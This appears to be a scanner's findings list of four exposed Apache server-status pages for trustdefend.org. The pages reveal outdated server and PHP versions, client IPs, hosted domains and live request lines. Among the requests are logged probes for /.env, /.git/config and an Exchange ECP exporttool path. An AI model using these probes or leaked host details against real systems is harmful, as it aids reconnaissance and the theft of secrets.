      5.255.231.156vidook.ru:8080GET /%D0%BA%D0%B0%D0%BA%2B%D0%BF%D0%B5%D1%80%D0%B5%D1%81%D1%82%
      
      32-25-0/0/10250.
      0.022880.00.00916.02
      95.108.213.250vidook.ru:8080GET /%D1%82%D0%B0%D1%80%D0%BA%D
      Found on 2024-06-08 00:56
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42091e3c2e

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Thursday, 06-Jun-2024 16:25:40 MSK
      Restart Time: Tuesday, 02-Apr-2024 09:40:58 MSK
      Parent Server Config. Generation: 2530
      Parent Server MPM Generation: 2529
      Server uptime:  65 days 6 hours 44 minutes 42 seconds
      Server load: 12.24 11.52 10.99
      Total accesses: 115789121 - Total Traffic: 11754.3 GB
      CPU Usage: u88.56 s25.69 cu0 cs0 - .00203% CPU load
      20.5 requests/sec - 2.1 MB/second - 106.4 kB/request
      13 requests currently being processed, 6 idle workers
      WWW.W.W_W_W.WWW.W._.._.W__........W.............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-2529273620/19/4907069W
      0.04600.00.36511494.00
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      1-2529202990/152/4836445W
      0.35100.059.10502363.72
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      2-2529206350/287/4758251W
      0.71000.021.19497129.28
      3.142.197.212ventgrad.tomsk.ru:8080GET /index.php/0000001/%D0%BD%D0%B5%D1%82-%D0%BA%D0%B0%D1%82%D0
      
      3-2529-0/0/4682341.
      0.111100.00.00490296.81
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      4-2529241760/122/4603971W
      0.26200.024.05483767.00
      212.42.59.207lesnoj-prijut.ru:8080GET / HTTP/1.0
      
      5-2529-0/0/4550245.
      0.47600.00.00473231.00
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      6-2529247590/49/4467273W
      0.104300.04.11467377.22
      185.240.102.28potolokmy.ru:8080GET /wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&s
      
      7-2529258680/24/4382225_
      0.0503280.01.32454246.16
      185.191.56.204turistpro.ru:8080GET /category/perchatki-i-varezhki/ HTTP/1.0
      
      8-2529258930/56/4279350W
      0.10800.01.96448973.41
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      9-2529222140/114/4175880_
      0.27070.074.39437709.56
      135.181.93.182bannercode.ru:8080GET /banners/f.php?uid=107 HTTP/1.0
      
      10-2529258940/8/4108481W
      0.014300.00.43423952.50
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      11-2529-0/0/3991304.
      0.05700.00.00423624.75
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      12-2529259160/29/3865336W
      0.072100.01.57404978.38
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      13-2529273820/14/3705968W
      0.02000.01.03381845.81
      3.138.244.70ventgrad.tomsk.ru:8080GET /index.php/0000001/%D0%BD%D0%B5%D1%82-%D0%BA%D0%B0%D1%82%D0
      
      14-2529273830/19/3591270W
      0.03100.01.17375464.53
      212.42.59.207lesnoj-prijut.ru:8080GET / HTTP/1.0
      
      15-2529-0/0/3426329.
      0.032700.00.00359423.81
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      16-2529259940/53/3259967W
      0.09000.02.44343816.97
      94.180.26.162khochu-prodat.ru:8080GET /add.php?category=69 HTTP/1.0
      
      17-2529-0/0/3087559.
      0.492900.00.00324889.97
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      18-2529247660/75/2886558_
      0.15010280.014.46303022.66
      173.252.87.4khochu-prodat.ru:8080GET /zhaloba.php?link=21106 HTTP/1.0
      
      19-2529-0/0/2708214.
      0.023000.00.00283546.03
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      20-2529-0/0/2483545.
      0.102000.00.00264272.72
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-2529268460/44/2294959_
      0.08070.012.73245277.95
      95.108.213.145shooting-ua.com:8080GET /books/book_107.1.htm HTTP/1.0
      
      22-2529-0/0/2109286.
      0.022200.00.00222432.66
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-2529269060/40/1903740W
      0.07000.02.63199220.86
      167.99.182.39trustdefend.org:8080GET /server-status HTTP/1.0
      
      24-2529269670/49/1688584_
      0.09000.02.64181016.31
      80.82.76.214vuruguay.ru:8080GET /404-1 HTTP/1.0
      
      25-2529247840/31/1549053_
      0.07000.01.62158650.91
      167.99.182.39trustdefend.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      26-2529-0/0/1395143.
      0.018000.00.00145324.13
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-2529-0/0/1300378.
      0.075300.00.00135147.75
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-2529-0/0/1217421.
      0.227200.00.00129871.09
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-2529-0/0/1144868.
      0.246900.00.00121626.26
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-2529-0/0/1025417.
      0.008300.00.00106195.03
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-2529-0/0/952271.
      0.055800.00.00100142.95
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-2529-0/0/866138.
      0.212400.00.0090054.94
      127.0.0.1185.240.102
      Found on 2024-06-06 13:25
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42b73ee400

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Tuesday, 04-Jun-2024 18:52:13 MSK
      Restart Time: Tuesday, 02-Apr-2024 09:40:58 MSK
      Parent Server Config. Generation: 2462
      Parent Server MPM Generation: 2461
      Server uptime:  63 days 9 hours 11 minutes 15 seconds
      Server load: 12.82 13.39 12.11
      Total accesses: 112178953 - Total Traffic: 11347.2 GB
      CPU Usage: u94.03 s28.92 cu0 cs0 - .00225% CPU load
      20.5 requests/sec - 2.1 MB/second - 106.1 kB/request
      18 requests currently being processed, 37 idle workers
      ____W_CWW_W_W____._WWW_____W_W_W_._________.W___W__WWW___W......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-2461266090/7/4782439_
      0.010420.00.21496693.41
      103.116.39.16shikoku.studio:8080GET /user/cillievlkw HTTP/1.0
      
      1-2461260000/22/4711402_
      0.051190.02.06488396.50
      188.130.163.255bannerlink.ru:8080GET /bancode.php?id=48 HTTP/1.0
      
      2-2461260440/20/4636560_
      0.0401400.00.65483017.50
      103.116.39.16shikoku.studio:8080POST / HTTP/1.0
      
      3-2461260750/13/4563553_
      0.0416480.01.00476908.56
      46.8.192.191kukma.ru:8080GET /po_liniyam/liniya_granit_ultra/ HTTP/1.0
      
      4-2461201340/132/4485235W
      0.316200.05.21469494.59
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      5-2461218860/38/4435503_
      0.10000.01.84459758.53
      147.182.149.75trustdefend.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      6-2461266841/2/4354057C
      0.00000.30.15454151.72
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      7-2461239390/96/4271270W
      0.201600.04.52440521.00
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      8-2461260760/21/4169817W
      0.06000.00.56436390.22
      66.249.76.227khochu-prodat.ru:8080GET /list.php?category=28&srrazdel=4009&srrazdel=4301&srrazdel=
      
      9-2461266920/3/4068948_
      0.00190.00.37424533.00
      45.80.46.123pz16.ru:8080POST /aj/ok1 HTTP/1.0
      
      10-2461121940/107/4000498W
      0.3032800.025.01411595.00
      95.108.213.171mebozon.ru:8080GET /index.php?route=extension/payment/yandex_money/market HTTP
      
      11-2461261100/14/3886098_
      0.04187380.00.71410475.25
      95.24.146.38mival.ru:8080GET /wrlkj598rlirq38tuoeq/ HTTP/1.0
      
      12-2461261110/4/3763623W
      0.002000.00.08393175.16
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      13-2461239870/68/3608309_
      0.1907070.030.77370584.91
      213.87.133.172afinasport.ru:8080GET /all-news?aridius_news_id=18 HTTP/1.0
      
      14-2461261120/16/3497923_
      0.030140.00.76364330.66
      188.130.163.255bannerlink.ru:8080GET /bancode.php?id=49 HTTP/1.0
      
      15-2461253330/48/3332574_
      0.111610.02.67348676.56
      66.249.76.194dsvision.ru:8080GET /product/ds-2td2117-6v1/ HTTP/1.0
      
      16-2461266940/4/3170271_
      0.00010.00.06333666.47
      213.180.203.15vidook.ru:8080GET /error404/ HTTP/1.0
      
      17-2461-0/0/3000273.
      0.03100.00.00313975.25
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      18-2461218890/64/2804567_
      0.140731160.027.77294102.34
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      19-2461247080/60/2630678W
      0.15100.05.53273953.38
      185.240.102.28domrozstore.ru:8080GET /shop/bukety/sbornyye-bukety/roza-ekvador/vyvernutye-rozy-m
      
      20-2461267020/1/2409427W
      0.00000.00.00255028.89
      147.182.149.75trustdefend.org:8080GET /server-status HTTP/1.0
      
      21-2461267030/2/2221038W
      0.00600.00.00236432.33
      173.252.70.4mebozon.ru:8080GET /shkafy/raspashnye/shkaf-dvuhdvernyj-masha-i-medved-folk?pa
      
      22-2461267060/5/2037020_
      0.0107330.00.38213732.09
      3.142.69.168ustami-mladenca.ru:8080GET /catalog/detskie-krovatki/gandylyans/almaz-mebel/mozhginski
      
      23-2461267070/3/1839550_
      0.00013490.00.08192079.39
      66.249.68.34khochu-prodat.ru:8080GET /list.php?category=28&srrazdel=4165&srrazdel=4187&srrazdel=
      
      24-2461261770/13/1623053_
      0.0201290.00.63173598.06
      192.44.68.138tourslife.ru:8080GET /uploads/images/main/49_big_1368375562.JPG HTTP/1.0
      
      25-2461135970/264/1490958_
      0.6212550.016.18151891.23
      173.252.83.24beeline-otzyvy.ru:8080GET /profile/demidovan/wall/ HTTP/1.0
      
      26-2461267190/4/1339571_
      0.01040.00.15138797.89
      213.87.133.172afinasport.ru:8080GET /catalog/view/theme/fractal/js/font-awesome/fonts/fontaweso
      
      27-2461261790/11/1248506W
      0.02000.00.70129453.48
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      28-2461267200/2/1166566_
      0.00059800.00.25124077.24
      69.171.230.14mebozon.ru:8080GET /shkafy/shkafy-uglovye/shkaf-uglovoy-uyut-versal-5-1?page=9
      
      29-2461136750/49/1098384W
      0.1332600.04.08116105.01
      213.180.203.41mebozon.ru:8080GET /index.php?route=extension/payment/yandex_money/market HTTP
      
      30-2461221650/139/981138_
      0.331160.07.59101348.76
      95.24.27.46zworkstation.ru:8080
      Found on 2024-06-04 15:52
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb427a7505d6

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Sunday, 02-Jun-2024 23:34:09 MSK
      Restart Time: Tuesday, 02-Apr-2024 09:40:58 MSK
      Parent Server Config. Generation: 2331
      Parent Server MPM Generation: 2330
      Server uptime:  61 days 13 hours 53 minutes 10 seconds
      Server load: 10.50 11.19 11.60
      Total accesses: 108530531 - Total Traffic: 10955.3 GB
      CPU Usage: u82.94 s22.23 cu0 cs0 - .00198% CPU load
      20.4 requests/sec - 2.1 MB/second - 105.8 kB/request
      11 requests currently being processed, 8 idle workers
      __WC.W_W_W.WW__.WWW_W._.........................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-2330193530/13/4640139_
      0.0202930.00.64481166.41
      3.145.181.170ventgrad.tomsk.ru:8080GET /index.php/0000001/%D0%BD%D0%B5%D1%82-%D0%BA%D0%B0%D1%82%D0
      
      1-2330170490/97/4574538_
      0.220310.06.77473365.31
      3.15.188.230ventgrad.tomsk.ru:8080GET /index.php/0000001/%D0%BD%D0%B5%D1%82-%D0%BA%D0%B0%D1%82%D0
      
      2-2330157550/175/4501892W
      0.45000.09.91467841.81
      141.98.255.143smart-les.ru:8080POST /shop/pilomateriali/polog/planken-polog-pryamoj-massiv-20x
      
      3-233096801/257/4431688C
      0.65000.326.15462255.25
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      4-2330-0/0/4353976.
      0.01000.00.00455124.31
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      5-23308570/451/4305624W
      1.112000.027.84446073.50
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      6-2330181830/67/4224035_
      0.1901800.04.04439350.22
      83.99.151.70foto-dekor.ru:8080GET /delivery HTTP/1.0
      
      7-2330182890/63/4146948W
      0.13400.03.09427095.34
      198.235.24.175tonkietela.ru:8080GET / HTTP/1.0
      
      8-2330139860/241/4047721_
      0.58000.012.45423288.69
      139.162.210.205trustdefend.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      9-2330194120/7/3950506W
      0.01000.00.29411345.31
      34.229.214.153music.vkpayme.ru:8080GET /gift/ HTTP/1.0
      
      10-2330-0/0/3884493.
      0.421100.00.00398965.75
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      11-2330100740/387/3773809W
      1.10000.074.45397549.75
      139.162.210.205trustdefend.org:8080GET /server-status HTTP/1.0
      
      12-2330187260/33/3651601W
      0.10000.01.64380053.44
      64.124.8.79mapsshop.ru:8080GET /vektornaja_karta_poselka_zhukovskij_mif/data/pictures_tpl/
      
      13-2330188300/39/3498353_
      0.07020.02.00358713.34
      3.145.193.134ritkar.com:8080GET /catalog/zaschita-ot-obschih-proizvodstvennyh-zagryaznenij/
      
      14-2330188990/31/3394376_
      0.0707200.01.70353254.41
      91.236.50.131xcanshop.ru:8080GET /product/kolczo-perehodnoe-redukczionnoe-xcan-dlya-diskov-2
      
      15-2330-0/0/3234284.
      0.01900.00.00337765.47
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      16-2330189370/20/3077767W
      0.05000.01.77322244.78
      66.249.76.70ventgrad.tomsk.ru:8080GET /index.php/katalog?start=72&virtuemart_manufacturer_id=36&d
      
      17-2330189870/18/2909729W
      0.05000.01.69303686.97
      66.249.66.198bestcube.space:8080GET /chto-znachit-fraza-mem-eshhkere/ HTTP/1.0
      
      18-2330146280/165/2720331W
      0.80000.0171.74284219.34
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      19-2330189910/21/2548476_
      0.040100.01.01264821.13
      185.195.24.187bannercode.ru:8080GET /banners/fv.php?&ison=1&uid=583&vt=8&dref=https://multipult
      
      20-2330164580/51/2333640W
      0.146500.013.62246301.98
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      21-2330-0/0/2147905.
      0.001200.00.00228064.92
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-2330189930/21/1972046_
      0.040820.01.14206447.55
      18.220.235.104mapsshop.ru:8080GET /vektornaja_karta_sela_filonovo_eps.html HTTP/1.0
      
      23-2330-0/0/1776030.
      0.145100.00.00184808.97
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-2330-0/0/1565235.
      0.444300.00.00166918.95
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-2330-0/0/1439323.
      0.019400.00.00146573.19
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-2330-0/0/1291907.
      0.028700.00.00133608.27
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-2330-0/0/1204753.
      0.261300.00.00124284.09
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-2330-0/0/1125375.
      0.012329730.00.00119658.54
      91.236.50.131xcanshop.ru:8080GET /shop/page/46/?orderby=popularity HTTP/1.0
      
      29-2330-0/0/1057714.
      0.3038600.00.00111496.85
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-2330-0/0/944640.
      0.0147300.00.0097251.05
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-2330-0/0/875151.
      0.5224000.00.0091060.20
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      
      Found on 2024-06-02 20:34
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42bf07bce3

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Sunday, 02-Jun-2024 00:45:40 MSK
      Restart Time: Tuesday, 02-Apr-2024 09:40:58 MSK
      Parent Server Config. Generation: 2277
      Parent Server MPM Generation: 2276
      Server uptime:  60 days 15 hours 4 minutes 42 seconds
      Server load: 8.82 9.91 9.65
      Total accesses: 106661062 - Total Traffic: 10740.1 GB
      CPU Usage: u82.28 s21.78 cu0 cs0 - .00199% CPU load
      20.4 requests/sec - 2.1 MB/second - 105.6 kB/request
      17 requests currently being processed, 0 idle workers
      WWWWWW..WWWW.W.W...WW........WW.................W...............
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-2276174350/33/4566467W
      0.06200.03.32473164.25
      217.113.194.153notarialnyperevod.ru:8080GET /robots.txt HTTP/1.0
      
      1-2276178910/6/4501181W
      0.01100.00.29464939.28
      162.240.172.79tour-rus.ru:8080GET /.env HTTP/1.0
      
      2-2276180460/0/4430535W
      0.09000.00.00459150.59
      167.172.158.128trustdefend.org:8080GET /server-status HTTP/1.0
      
      3-2276103890/183/4362617W
      0.44000.038.81453587.53
      18.219.91.248ventgrad.tomsk.ru:8080GET /index.php/0000001/%D0%BD%D0%B5%D1%82-%D0%BA%D0%B0%D1%82%D0
      
      4-2276169180/30/4284258W
      0.052000.01.80447052.84
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      5-2276109160/71/4237781W
      0.151300.018.80437985.44
      78.107.252.54slashfocus.ru:8080POST /gw/ HTTP/1.0
      
      6-2276-0/0/4156554.
      0.051800.00.00431827.97
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      7-2276-0/0/4080783.
      0.331600.00.00418730.22
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      8-2276113790/147/3982935W
      0.34000.012.05415284.94
      5.253.61.250sudamerica.ru:8080GET /images/save.php?url=https%3A%2F%2Fsudamerica.ru%2Fimages%2
      
      9-2276139170/121/3887904W
      0.27300.011.40404107.13
      188.32.17.203odinkad.ru:8080GET /wp-content/plugins/bdthemes-prime-slider/assets/vendor/js/
      
      10-2276152230/89/3822545W
      0.19000.07.71392063.44
      89.188.168.132ds-hikvision.ru:8080GET /category/nvr-registratory-hikvision/?sort=price&order=asc 
      
      11-227657440/203/3712705W
      0.521300.021.76390669.56
      78.107.252.54reportium.ru:8080POST /gw/ HTTP/1.0
      
      12-2276-0/0/3592630.
      0.074900.00.00373911.09
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      13-2276139190/84/3441909W
      0.191300.013.25352479.19
      78.107.252.54intelspro.ru:8080POST /gw/ HTTP/1.0
      
      14-2276-0/0/3340216.
      0.203100.00.00346293.16
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      15-2276139710/85/3180447W
      0.18100.07.13331932.66
      82.165.103.249woostore.ru:8080GET /simple.php HTTP/1.0
      
      16-2276-0/0/3026483.
      0.124300.00.00316472.44
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      17-2276-0/0/2860206.
      0.015300.00.00297638.78
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      18-2276-0/0/2674368.
      0.152800.00.00277751.81
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      19-2276152640/91/2502392W
      0.20100.08.30259045.11
      106.75.165.113sait64.ru:8080GET /.git/config HTTP/1.0
      
      20-2276152650/22/2294494W
      0.054800.00.86241582.09
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      21-2276-0/0/2107059.
      0.474500.00.00222600.80
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-2276-0/0/1937069.
      0.015500.00.00201954.09
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-2276-0/0/1745872.
      0.6316900.00.00181109.16
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-2276-0/0/1535664.
      0.5222500.00.00163583.48
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-2276-0/0/1410893.
      0.3525200.00.00143314.64
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-2276-0/0/1267234.
      0.0124600.00.00130578.45
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-2276-0/0/1181050.
      0.474400.00.00121520.95
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-2276-0/0/1105148.
      0.0324200.00.00117412.00
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-227666220/152/1036001W
      0.37000.043.89108787.19
      190.135.143.228sudamerica.ru:8080POST /api/bbs HTTP/1.0
      
      30-227666230/265/924550W
      0.66000.025.1294923.64
      5.253.61.250sudamerica.ru:8080GET /images/?url=https%3A%2F%2Fel-pais-uruguay-production-web.s
      
      31-2276-0/0/855865.
      0.0325017160.00.0088910.10
